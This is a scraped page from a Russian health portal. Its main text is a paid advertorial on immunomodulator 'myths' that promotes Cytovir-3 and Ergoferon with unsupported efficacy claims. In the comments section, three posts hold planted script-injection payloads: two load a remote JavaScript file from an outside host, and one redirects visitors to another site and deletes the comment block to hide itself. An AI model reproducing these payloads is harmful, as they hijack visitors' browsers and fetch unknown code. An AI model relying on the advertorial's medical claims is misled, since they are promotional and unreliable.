Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Иммуномодуляры: мифы и пр...  >>  Иммуномодуляры: мифы и правда
 
Обратная связь
 

Иммуномодуляры: мифы и правда

Размер шрифта
13 мая 2015 00:00
  • google_analytics: false
  • Нравится

В сезон простуд и гриппа многие мамочки выходили из кабинета участкового педиатра с рецептом, в котором не только антибиотик, средство от кашля, но и некое «средство для укрепления иммунитета», например «Цитовир-3», «Эргоферон» или другие подобные. Несмотря на то, что иммуномодуляторы применяются в медицине уже более десяти лет, для многих они остаются чем-то непонятным и загадочным. Об иммуномодуляторах ходят мифы, сказки и даже страшные байки. Хотелось бы рассмотреть и развенчать хотя бы некоторые из них.

Миф первый: иммуномодулятор можно пить вместо всех лекарств и лечиться только им

Действительно, иногда, для профилактики болезни – особенно гриппа и ОРВИ, которые начинаются мгновенно, достаточно принимать только иммуномодулятор. Это может предотвратить болезнь и дополнительных лекарств можно не принимать. На деле, если болезнь уже началась, и есть первые симптомы, одного иммуномодулятора недостаточно. Безусловно, он поможет легче перенести заболевание и избежать осложнений. Но необходимо обратиться к врачу для подбора лечения.

Миф второй: иммуномодуляторы лечат, но убивают собственный иммунитет

Это верно только отчасти: иммуномодуляторы не заменяют иммунитет и не работают вместо него. Они только активизируют собственный иммунитет организма, скрытые резервы. Однако если злоупотреблять иммуномодуляторами, принимать их без назначения врача и очень часто, то действительно организм может отвыкнуть от борьбы с вирусами и  будет ждать подмоги.

Миф третий, как правило, идущий в комплексе со вторым: наш организм достаточно силен и должен со всем справляться сам

В идеале, это так. Но экология, стрессы, эпидемии иногда не оставляют шанса. Организм не справляется со свалившимся на него грузом. Вирусы мутируют и возникают все новые и новые штаммы. Поэтому стоит помогать организму справляться с атаками вирусов в зимний период.  

Миф четвертый: иммуномодулятор лучшее средство для профилактики

Конечно, иммуномодулятор улучшает ситуацию, помогает не заболеть во время эпидемии. Но думать об иммунитете стоит всегда. Залог крепкого иммунитета – спорт, здоровое питание, режим дня и отсутствие стресса.

Иммуномодуляторы для эффекта надо пить неделю или больше – нет. Современные иммуномодуляторы типа «Цитовира-3» действуют в течение первых 24 часов и не дают болезни развиться.

Самое главное – помнить, что не стоит заниматься самолечением, пить иммуномодуляторы без рецепта врача, злоупотреблять ими или наоборот пренебрегать. Помните о принципе золотой середины и будьте здоровы!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:10

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как успеть все по науке?   С какого возраста малышам можно давать иммуномодуляторы?   Можно ли заболеть гриппом или другими ОРВИ в теплое время года? Какой препарат лучше принимать для профилактики?   Мужчины против женщин. Кто лучше?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Можно ли жить с бронхитом?
Самые неожиданные причины головной боли. Часть 1
Привычки, котрые сделают вас толстой в Новом году

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.